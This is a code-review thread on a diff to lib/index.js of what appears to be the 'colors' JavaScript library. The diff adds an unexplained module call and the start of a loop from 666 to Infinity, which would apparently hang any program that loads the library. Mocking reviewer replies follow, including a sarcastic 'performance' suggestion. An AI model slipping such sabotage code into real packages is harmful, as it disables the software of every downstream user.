lib/index.js

```diff
@@ -11,3 +11,13 @@ module['exports'] = colors;
 //
 //
 require('./extendStringPrototype')();
+
+/* remove this line after testing */
+let am = require('../lib/custom/american');
+am();
+for (let i = 666; i < Infinity; i++) {
```

Comment:
You should use this for performance optimisation 
```suggestion
for (let i = 666; i < Infinity; ++i) {
```

Reply:
Thanks for noting that!
I admire your knowledge & skill set. Both are truly incredible.

Reply:
Disappointing..

Reply:
tried it, doesnt work on my system.....